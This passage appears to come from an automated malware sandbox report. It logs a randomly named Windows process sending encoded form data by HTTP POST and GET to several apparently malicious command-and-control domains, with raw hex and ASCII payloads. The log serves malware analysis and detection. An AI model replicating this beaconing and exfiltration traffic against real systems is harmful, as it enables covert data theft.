                                                                                                                                                                            Data Ascii: Ah=9qpKTRFtJSx+0cilvcGTwCHBZyfNtFBkl82fDxfEwnouu3ESUDDPsOo23yQz12W9rA/mEuvIbemz4RdMBTTxQwm7Kn0FiZ3NGXNpl5jwj4bbz8/DExqZsxM5OKLEtSApni33Emqs6M8fef1UJT9iJVenvy+TEoX+kTyp2sBFAXJ2NF19uuFeQcL+9mPx2/uqIusQ1lw=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            2192.168.2.5636933.33.130.190805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:20.085330009 CEST867OUTPOST /974s/ HTTP/1.1
                                                                                                                                                                            Host: www.searchgpt.homes
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.searchgpt.homes
                                                                                                                                                                            Referer: http://www.searchgpt.homes/974s/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 71 70 4b 54 52 46 74 4a 53 78 2b 30 34 6d 6c 71 2f 75 54 68 79 48 47 41 79 66 4e 6a 6c 42 67 6c 38 36 66 44 7a 79 5a 77 30 4d 75 75 53 34 53 56 48 66 50 76 4f 6f 32 38 53 51 32 36 57 57 6d 72 41 6a 45 45 76 54 49 62 65 43 7a 34 55 35 4d 41 67 72 32 52 67 6d 35 48 48 30 48 73 35 33 4e 47 58 4e 70 6c 35 32 64 6a 34 44 62 77 4d 76 44 47 51 71 57 68 52 4d 2b 65 61 4c 45 70 53 41 74 6e 69 32 53 45 6b 4f 4b 36 50 49 66 65 62 39 55 49 41 6c 6c 65 6c 65 39 79 69 2f 36 49 64 6d 36 38 78 4f 68 37 4e 59 42 63 32 68 41 49 7a 59 58 30 4d 4e 32 44 38 6e 47 74 31 48 47 6e 50 50 44 53 4e 38 67 72 79 6c 6e 46 6d 30 69 49 61 4e 38 34 2b 68 51 5a 37 56 74 53 6d 6c 2b
                                                                                                                                                                            Data Ascii: Ah=9qpKTRFtJSx+04mlq/uThyHGAyfNjlBgl86fDzyZw0MuuS4SVHfPvOo28SQ26WWmrAjEEvTIbeCz4U5MAgr2Rgm5HH0Hs53NGXNpl52dj4DbwMvDGQqWhRM+eaLEpSAtni2SEkOK6PIfeb9UIAllele9yi/6Idm68xOh7NYBc2hAIzYX0MN2D8nGt1HGnPPDSN8grylnFm0iIaN84+hQZ7VtSml+


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            3192.168.2.5636943.33.130.190805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:22.628164053 CEST1884OUTPOST /974s/ HTTP/1.1
                                                                                                                                                                            Host: www.searchgpt.homes
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.searchgpt.homes
                                                                                                                                                                            Referer: http://www.searchgpt.homes/974s/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 71 70 4b 54 52 46 74 4a 53 78 2b 30 34 6d 6c 71 2f 75 54 68 79 48 47 41 79 66 4e 6a 6c 42 67 6c 38 36 66 44 7a 79 5a 77 30 45 75 75 41 41 53 55 67 72 50 67 75 6f 32 2f 53 51 33 36 57 58 6d 72 41 37 41 45 76 66 32 62 63 4b 7a 35 79 6c 4d 55 46 48 32 49 51 6d 35 4f 6e 30 47 69 5a 32 5a 47 58 64 74 6c 35 6d 64 6a 34 44 62 77 4b 4c 44 43 42 71 57 6a 52 4d 35 4f 4b 4c 49 74 53 41 46 6e 6a 54 76 45 6b 61 38 37 35 34 66 65 36 42 55 4f 7a 42 6c 63 46 65 37 7a 69 2f 69 49 64 69 31 38 31 75 48 37 4e 73 37 63 31 78 41 4a 30 55 42 6d 2b 52 31 56 73 48 72 67 32 4c 6e 35 2f 62 41 55 50 67 72 75 51 42 6e 61 45 59 77 44 74 59 36 2b 76 4a 66 48 73 6b 32 55 68 41 2b 56 61 56 65 51 50 79 38 33 36 51 38 59 71 44 6a 4e 5a 46 72 4b 42 66 77 48 68 70 44 31 37 5a 77 41 69 35 48 70 44 61 68 65 59 48 44 6c 64 72 43 75 42 58 45 61 43 76 35 2b 54 4c 42 41 63 6a 6e 39 4a 51 4f 4b 57 31 34 32 47 78 6d 6b 4a 61 56 61 32 2f 77 44 50 41 4e 4f 66 4d 52 31 5a 4c 4e 39 44 6c 4f 47 54 4f 36 6f 6b 4a 35 42 6c 67 72 50 6e 79 [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=9qpKTRFtJSx+04mlq/uThyHGAyfNjlBgl86fDzyZw0EuuAASUgrPguo2/SQ36WXmrA7AEvf2bcKz5ylMUFH2IQm5On0GiZ2ZGXdtl5mdj4DbwKLDCBqWjRM5OKLItSAFnjTvEka8754fe6BUOzBlcFe7zi/iIdi181uH7Ns7c1xAJ0UBm+R1VsHrg2Ln5/bAUPgruQBnaEYwDtY6+vJfHsk2UhA+VaVeQPy836Q8YqDjNZFrKBfwHhpD17ZwAi5HpDaheYHDldrCuBXEaCv5+TLBAcjn9JQOKW142GxmkJaVa2/wDPANOfMR1ZLN9DlOGTO6okJ5BlgrPnySllMHZnwCMnNOKil6CPHH4gKx12fisvfBsq3hDaUeg/yde7DVHUlvO25Kgt0r+fbYjypxE5X6kkf1xWx3ei49qRJByWhNWITCHgVbzqrrVIN33VHb8fO6Mzv0Ii0KSYYc3ZyWZCX4N839HMyNkvnHjsdp8+uDM8jAa+i+OeMGG2aql5j5UIhI7i/mWM7lbNTsfDOs3CaNXJYheOLl26EVWijn8Yp+fz7gguatfDI9DeOMD4JjoMJ14Is+eUCmNuorRaU0j7cTB2DMOxmWoQshbTLO/F4HQZ/CBvkBtfRKP12OhkRrHD4Fkh0jQ6doMxOsxdENl9681SyhszgOh59FFTJ97Vv1YcS+4c0gUNViw1pOvvqeVLvvX+yt7GdlDAvGgfVsFIc6TN4jv88KydNTh55/Z4x7ObGZGQN/ZaU9FeSbSUsKkkkMTgjUBg9VaGrxlJv16IZbeFrsnv5G9Do39LgZQc5W6NT7e4gpD5szCzIpuywQmXGgEjjNjHmLiI5fKRxaBX1PVihKlkRpXMuqbsDPaaq4wctZnil4NtPzaoooxHNLHJZJbz5oQkWTAtd8lPYmvwMtqVtZNFeZrHLU3D1a2n48uUqoW5bONwUaAIp0Qcb0xbHysWA1/c96lwFnUxQ63UDxShi3oQsA3wHmU0ef2wZnHEnul [TRUNCATED]


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            4192.168.2.5636953.33.130.190805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:25.602435112 CEST587OUTGET /974s/?Ah=woBqQkVhEnZr0PORhZ6z2TjABxOeyQlLpumkFgr+omNv0XEbVjbEhcV/qAVpymWGpDThRtO2eu+z9gp0JATUVQjZP0Y2t77DZFNVy7Otm7ne66vNCWn1tABYRqLOiyRBkA==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.searchgpt.homes
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:30:26.054779053 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                            Server: openresty
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:26 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 269
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 68 3d 77 6f 42 71 51 6b 56 68 45 6e 5a 72 30 50 4f 52 68 5a 36 7a 32 54 6a 41 42 78 4f 65 79 51 6c 4c 70 75 6d 6b 46 67 72 2b 6f 6d 4e 76 30 58 45 62 56 6a 62 45 68 63 56 2f 71 41 56 70 79 6d 57 47 70 44 54 68 52 74 4f 32 65 75 2b 7a 39 67 70 30 4a 41 54 55 56 51 6a 5a 50 30 59 32 74 37 37 44 5a 46 4e 56 79 37 4f 74 6d 37 6e 65 36 36 76 4e 43 57 6e 31 74 41 42 59 52 71 4c 4f 69 79 52 42 6b 41 3d 3d 26 36 52 47 44 3d 72 38 65 48 77 6e 4d 70 62 32 64 78 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ah=woBqQkVhEnZr0PORhZ6z2TjABxOeyQlLpumkFgr+omNv0XEbVjbEhcV/qAVpymWGpDThRtO2eu+z9gp0JATUVQjZP0Y2t77DZFNVy7Otm7ne66vNCWn1tABYRqLOiyRBkA==&6RGD=r8eHwnMpb2dxK"}</script></head></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            5192.168.2.56369638.47.233.19805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:31.596084118 CEST829OUTPOST /mkti/ HTTP/1.1
                                                                                                                                                                            Host: www.2q63f.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.2q63f.top
                                                                                                                                                                            Referer: http://www.2q63f.top/mkti/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 75 6c 37 42 42 54 6e 48 73 75 44 4f 48 4c 32 75 52 39 47 71 35 77 69 56 53 4e 53 4d 66 5a 64 37 2b 74 58 4c 31 43 62 6f 62 2b 4f 35 69 76 39 35 79 37 2f 77 67 4d 76 45 7a 45 2b 71 38 4f 57 79 76 53 54 46 4c 76 70 62 6a 33 6f 2f 4c 32 30 56 78 33 41 50 2f 74 49 4b 61 34 62 37 4e 4e 2f 44 75 6c 56 6f 4d 59 4c 66 56 48 4e 64 69 78 6e 4f 46 38 4d 5a 42 71 61 6e 74 54 33 78 4f 31 57 6c 4e 48 38 62 37 61 4e 6e 56 6b 45 31 78 4f 6d 6e 6f 63 4e 43 38 79 61 56 41 58 41 31 71 30 46 33 63 63 7a 51 73 67 63 48 56 50 6d 51 4e 51 4c 57 58 4d 75 74 63 6f 79 71 4b 59 2f 4b 32 6c 77 44 67 62 53 4b 49 68 67 3d
                                                                                                                                                                            Data Ascii: Ah=ul7BBTnHsuDOHL2uR9Gq5wiVSNSMfZd7+tXL1Cbob+O5iv95y7/wgMvEzE+q8OWyvSTFLvpbj3o/L20Vx3AP/tIKa4b7NN/DulVoMYLfVHNdixnOF8MZBqantT3xO1WlNH8b7aNnVkE1xOmnocNC8yaVAXA1q0F3cczQsgcHVPmQNQLWXMutcoyqKY/K2lwDgbSKIhg=
                                                                                                                                                                            Sep 27, 2024 17:30:32.493469954 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:32 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            6192.168.2.56369938.47.233.19805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:34.146953106 CEST849OUTPOST /mkti/ HTTP/1.1
                                                                                                                                                                            Host: www.2q63f.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.2q63f.top
                                                                                                                                                                            Referer: http://www.2q63f.top/mkti/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 75 6c 37 42 42 54 6e 48 73 75 44 4f 47 71 47 75 58 61 71 71 37 51 69 57 4d 64 53 4d 52 35 64 2f 2b 74 4c 4c 31 41 32 7a 62 4c 57 35 69 4f 4e 35 78 36 2f 77 74 73 76 45 34 6b 2b 56 68 2b 57 35 76 53 66 37 4c 72 74 62 6a 30 55 2f 4c 33 45 56 78 45 59 4d 35 74 49 49 47 34 62 35 44 74 2f 44 75 6c 56 6f 4d 59 76 31 56 48 46 64 69 41 58 4f 55 74 4d 61 66 61 62 56 37 44 33 78 45 6c 57 35 4e 48 38 35 37 62 52 42 56 68 49 31 78 4d 2b 6e 6f 4e 4e 64 33 79 61 66 45 58 42 48 6b 6b 51 77 64 4e 58 34 77 57 4a 79 56 39 6d 49 4d 6d 6d 38 4e 75 6d 46 50 49 65 53 61 4c 33 39 6e 56 52 71 36 34 43 36 57 32 31 6e 4a 45 48 50 74 4b 47 30 4b 4c 42 77 6f 45 46 7a 5a 4c 65 55
                                                                                                                                                                            Data Ascii: Ah=ul7BBTnHsuDOGqGuXaqq7QiWMdSMR5d/+tLL1A2zbLW5iON5x6/wtsvE4k+Vh+W5vSf7Lrtbj0U/L3EVxEYM5tIIG4b5Dt/DulVoMYv1VHFdiAXOUtMafabV7D3xElW5NH857bRBVhI1xM+noNNd3yafEXBHkkQwdNX4wWJyV9mIMmm8NumFPIeSaL39nVRq64C6W21nJEHPtKG0KLBwoEFzZLeU
                                                                                                                                                                            Sep 27, 2024 17:30:35.076477051 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:34 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            7192.168.2.56370038.47.233.19805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:36.690921068 CEST1866OUTPOST /mkti/ HTTP/1.1
                                                                                                                                                                            Host: www.2q63f.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.2q63f.top
                                                                                                                                                                            Referer: http://www.2q63f.top/mkti/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 75 6c 37 42 42 54 6e 48 73 75 44 4f 47 71 47 75 58 61 71 71 37 51 69 57 4d 64 53 4d 52 35 64 2f 2b 74 4c 4c 31 41 32 7a 62 49 32 35 6a 39 56 35 6a 64 4c 77 73 73 76 45 6b 30 2b 51 68 2b 57 6b 76 53 48 6e 4c 75 31 4c 6a 79 51 2f 45 31 4d 56 7a 31 59 4d 71 4e 49 49 65 34 62 36 4e 4e 2f 57 75 6b 6b 76 4d 59 2f 31 56 48 46 64 69 43 50 4f 55 38 4d 61 64 61 61 6e 74 54 33 39 4f 31 57 64 4e 48 30 44 37 62 6c 33 56 53 41 31 77 73 75 6e 6b 66 6c 64 31 53 61 52 44 58 42 66 6b 6b 4d 2f 64 4e 62 53 77 57 56 63 56 2f 6d 49 4e 78 6a 46 52 75 53 54 63 62 75 58 5a 37 76 6e 35 51 56 70 7a 61 53 57 56 56 5a 36 4a 31 44 68 6f 4d 44 31 48 71 41 49 38 56 52 35 62 73 48 6d 59 70 5a 59 47 69 62 39 32 61 67 36 42 31 74 78 79 6e 41 54 4a 64 2b 6f 71 4f 6e 72 73 51 43 72 64 58 4c 37 6c 37 36 4f 32 47 57 55 58 30 43 6f 69 2f 67 48 63 52 6d 68 42 6e 59 50 62 51 54 52 71 42 49 64 52 4d 56 37 76 32 36 4a 64 4c 7a 53 72 4f 32 4e 35 6e 32 5a 79 58 31 32 50 32 32 44 72 55 57 63 32 52 46 71 64 4a 72 77 61 4c 52 36 76 74 46 [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=ul7BBTnHsuDOGqGuXaqq7QiWMdSMR5d/+tLL1A2zbI25j9V5jdLwssvEk0+Qh+WkvSHnLu1LjyQ/E1MVz1YMqNIIe4b6NN/WukkvMY/1VHFdiCPOU8MadaantT39O1WdNH0D7bl3VSA1wsunkfld1SaRDXBfkkM/dNbSwWVcV/mINxjFRuSTcbuXZ7vn5QVpzaSWVVZ6J1DhoMD1HqAI8VR5bsHmYpZYGib92ag6B1txynATJd+oqOnrsQCrdXL7l76O2GWUX0Coi/gHcRmhBnYPbQTRqBIdRMV7v26JdLzSrO2N5n2ZyX12P22DrUWc2RFqdJrwaLR6vtFhunkrtZnGpEqhSrGUbqnO5v4AMqycwaN28u+yA5fFsvraIWPRVQ+02T1vYB+lOYPmdY/hDkkU/UxgSBZdoWMupeOde4qOBbaBvzZlQc+GSnDKXsCaU/hUbdRXMvfZz6zTZaRWNxaTkS1qoqYi6NuJAyweQyueh19dJ+xzOHpcnjbzrs5RMV+2WSzTsfxZRU6aSW/42C7SAMYKphh6mbQc2X8+YK93N7pwShE0fGblk8uJ7YEDgdqO+2feN0NXhTogLSNPuVl7ZbiHrcO4cym/RXa7mp6mcxEz4fEmhzuj7QdNwHsk0eJj5v7s3YvexsVAJ8t03Zcq4gy6oC1DpM+WgAbeP5UofU+9bixhy9PpatsaNcJOf+5Oex9BmX97pAk5X6UxjfbRIMPHy+2K6u9NHD/REfmNZrC2Bsgqi4z03Gaxohn6zRQ3j7bIx8iYUau+XB0Fj+98McscyfXMuzdWafYykSJdnmnpqsFOYL9qQlPltNBIJU5q41lkJC/rsKQfl8UNP9fN3l90j2QdJdkg4pWlLCBxYfgn+wBQx3BO4uI3n8k5yrMw8wiLYbjCIcfOi99cI86RYvbX/8BqyHc2kF19KI0qoiG0lj/LcIS8gnooJ9yk1tMZQylBmWquzTAIea6MJVccovxPWXQv/FqMbJPo/dauRrwSy [TRUNCATED]
                                                                                                                                                                            Sep 27, 2024 17:30:37.596261024 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:37 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            8192.168.2.56370138.47.233.19805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:39.235620975 CEST581OUTGET /mkti/?6RGD=r8eHwnMpb2dxK&Ah=jnThCjOJiNX3HI/1X6ra8iqRT8LvO5Bl0cjrkRPRR4aUtJ5UnZH8goi0lUnBvvC66wXnOPoFvnQ+LE8o+1Q4j9xZYpeOMfjH2lF0fJzOXlNgjT3mfY10J4nKlD3uClfrXg== HTTP/1.1
                                                                                                                                                                            Host: www.2q63f.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:30:40.119501114 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:39 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            9192.168.2.563702172.67.165.25805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:45.432077885 CEST841OUTPOST /f66t/ HTTP/1.1
                                                                                                                                                                            Host: www.b5x7vk.agency
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.b5x7vk.agency
                                                                                                                                                                            Referer: http://www.b5x7vk.agency/f66t/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
